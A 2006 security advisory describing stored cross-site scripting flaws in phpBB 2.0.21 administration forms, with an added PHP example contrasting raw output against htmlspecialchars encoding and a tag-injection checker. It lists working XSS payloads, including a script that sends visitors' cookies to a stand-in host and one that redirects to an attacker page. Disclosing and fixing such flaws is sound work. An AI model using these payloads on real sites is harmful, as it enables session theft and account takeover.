phpBB 2.0.21 XSS in administration
**********************************
//-- By Blwood [renatrix@gmail.com]
//-- [ http://www.blwood.net ]
//--
Style Admin
-----------
Management & Create a theme
Many inputs are not properly filtered, e.g. style_name, head_stylesheet, body_background, tr_color1_name (all the "Simple Name" inputs)...
We can of course inject HTML this way : "><h1>Owned by Blwood :P</h1>
but it's more interesting to inject javascript :) :
"><body onload="alert('Owned by Blwood')"> => style_name
"><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ...
When an admin goes to Style Administration he will be Owned (inject in style_name).
When an admin edits a theme he will be Owned.
Group Administration
--------------------
Management
Input group_description is not correctly filtered; we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textarea>"><script>alert('Owned by Blwood')</script>
When an admin goes to Group Administration he'll be owned. But what's more, the groups can be seen in groupcp.php
by every visitor.
An exploit could be :
</textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>
or
</textarea>"><script>document.location='http://site.com/ownedpage.html'</script>
Ranks
-----
Rank Administration
Rank Title (input title) is not correctly filtered; we can inject js like : "><script>alert('xss')</script>
But what's interesting: if you give this rank to a user, the rank appears in that user's posts and the code is executed when someone views a topic :)
Now you can inject what you want, but at most 40 characters...
Smilies
-------
Smilies Editing Utility
Smiley Code : "><body onload="alert('Owned by Blwood')">
Configuration
-------------
General Configuration
Inputs are not correctly filtered. Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script>
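Every item above is the same defect seen through a different admin form: a stored value (style_name, group_description, rank title, smiley code, allow_html_tags) is written back into a form field without output encoding, so a double quote closes the attribute, or a closing </textarea> ends the element, and the rest of the value is parsed as markup. The PHP below is an added example, not phpBB's code and not the author's: the render_* functions are hypothetical stand-ins for the admin templates, the SAMPLE_* values are constructed from the alert() payloads in this advisory, and injected_tags() is a small defender's check that reports any tag in the rendered fragment other than the one the page meant to emit.

```php
<?php
// Added example, not phpBB's own code: the pattern behind every item in this
// advisory. An admin page writes a stored setting back into a form field; if
// the value is concatenated raw, a double quote closes the attribute and the
// remainder is parsed as markup. For group_description the field is a
// textarea, so a literal </textarea> is the break-out instead of a quote.
declare(strict_types=1);

// Constructed sample values modelled on the advisory's payloads (not real data).
const SAMPLE_STYLE_NAME = '"><script>alert(\'xss\')</script>';
const SAMPLE_GROUP_DESC = '</textarea>"><script>alert(\'xss\')</script>';

// Vulnerable shape: raw interpolation into a quoted attribute value.
function render_input_vulnerable(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened shape: encode for the HTML-attribute context. ENT_QUOTES matters:
// before PHP 5.4 the default was ENT_COMPAT, which leaves single quotes
// alone, so a single-quoted attribute stayed breakable.
function render_input_fixed(string $name, string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $safe . '" />';
}

// Vulnerable textarea: the payload needs no quote, only a closing tag.
function render_textarea_vulnerable(string $name, string $value): string
{
    return '<textarea name="' . $name . '">' . $value . '</textarea>';
}

// Hardened textarea: the same encoder works, because '<' becomes '&lt;' and
// the browser can no longer see a closing tag inside the element body.
function render_textarea_fixed(string $name, string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    return '<textarea name="' . $name . '">' . $safe . '</textarea>';
}

// Defender's check for a rendered fragment: collect every tag name in the
// output and return those that are not the single element we meant to emit.
// A non-empty result means the stored value escaped its context.
function injected_tags(string $html, string $expectedTag): array
{
    preg_match_all('/<\/?([a-z][a-z0-9]*)/i', $html, $m);
    $seen = array_unique(array_map('strtolower', $m[1]));
    return array_values(array_diff($seen, [strtolower($expectedTag)]));
}

// On the rank title: its 40-character limit is a length check, not an output
// encoding. SAMPLE_STYLE_NAME above is 31 characters and fits inside it.

if (PHP_SAPI === 'cli') {
    $cases = [
        ['style_name, raw',          render_input_vulnerable('style_name', SAMPLE_STYLE_NAME), 'input'],
        ['style_name, encoded',      render_input_fixed('style_name', SAMPLE_STYLE_NAME), 'input'],
        ['group_description, raw',   render_textarea_vulnerable('group_description', SAMPLE_GROUP_DESC), 'textarea'],
        ['group_description, encoded', render_textarea_fixed('group_description', SAMPLE_GROUP_DESC), 'textarea'],
    ];
    foreach ($cases as [$label, $html, $tag]) {
        $stray = injected_tags($html, $tag);
        printf("%-28s %s\n", $label, $stray ? 'INJECTED: ' . implode(',', $stray) : 'clean');
        echo '    ', $html, "\n";
    }
}
```

Run it with `php example.php`: the two raw cases report `INJECTED: script`, the two encoded cases report `clean`. The point for a reviewer of this kind of admin panel is that the fix belongs at output time, in the template or view that prints the value, and must match the context (attribute, element body, or a textarea) rather than relying on input length limits or on the field being admin-only: as the group_description case shows, the same stored value is also rendered to every visitor on groupcp.php.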
[ Video ]
http://www.blwood.net/advisory/phpbb2021xssadmin.rar
Published: 2006-07-24 (Securityvulns, SECURITYVULNS:DOC:13542)
https://vulners.com/securityvulns/SECURITYVULNS:DOC:13542